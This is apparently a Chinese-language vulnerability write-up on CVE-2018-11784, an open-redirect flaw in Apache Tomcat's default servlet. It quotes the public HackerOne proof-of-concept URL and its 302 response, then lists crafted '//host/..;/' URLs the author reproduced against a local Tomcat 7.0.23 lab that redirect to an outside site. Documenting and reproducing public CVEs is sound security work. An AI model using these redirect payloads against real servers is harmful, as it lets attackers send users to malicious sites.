CVE-2018-11784 Tomcat URL跳转漏洞

# Tomcat URL跳转漏洞

### 这个漏洞是有CVE的CVE-2018-11784，这是一个任意URL跳转漏洞，具体案例可以参考H1的一个漏洞，https://hackerone.com/reports/387007

– CVE描述：

https://nvd.nist.gov/vuln/detail/CVE-2018-11784

当前当Apache Tomcat版本在9.0.0.M1到9.0.11、8.5.0到8.5.33和7.0.23到7.0.90中的默认servlet返回到一个目录的重定向（例如，当用户请求’/foo’时重定向到’/foo/’）存在安全漏洞，

攻击者构造一个特制的URL可以将请求重定向到攻击者所控制的任意网站上去。

– 根据H1的漏洞，它的POC 即 EXP 也是：【这是真EXP的】

“`
构造请求：
https://idp.fr.cloud.gov//blackfan.ru/..;/css

HTTP 响应如下：
HTTP/1.1 302 Found
…
Location: //blackfan.ru/..;/css/
…

打开了https://blackfan.ru/..;/css/ 恶意地址

“`

– 本地项目 Tomcat 7.0.23

“`
➜ webapps tree -d -L 2
.
├── S2-005
│   ├── META-INF
│   ├── WEB-INF
│   └── example
├── VulDemo
│   ├── META-INF
│   ├── WEB-INF
│   ├── css
│   ├── images
│   ├── js
│   ├── testme.com
│   └── tools
├── fastjson-1.0
│   ├── META-INF
│   └── WEB-INF
└── smartbi
├── META-INF
├── WEB-INF
├── app
└── vision

20 directories
“`
– 实测构造有效POC如下：

“`
几个应用的访问URL如下：
http://192.168.0.6:8080/S2-005/example/HelloWorld.action
http://192.168.0.6:8080/fastjson-1.0/
http://192.168.0.6:8080/smartbi/vision/config.jsp
http://192.168.0.6:8080/VulDemo/
http://192.168.0.6:8080/VulDemo/js/login.js

哪么可以构造有效的POC部分如下：
http://192.168.0.6:8080//baidu.com//..;..;/S2-005/example

http://192.168.0.6:8080//baidu.com//..;/smartbi/vision
http://192.168.0.6:8080//baidu.com//..;/smartbi/vision/index.jsp
http://192.168.0.6:8080//baidu.com/..;/VulDemo/js
这些均会跳转到baidu.com站点
“`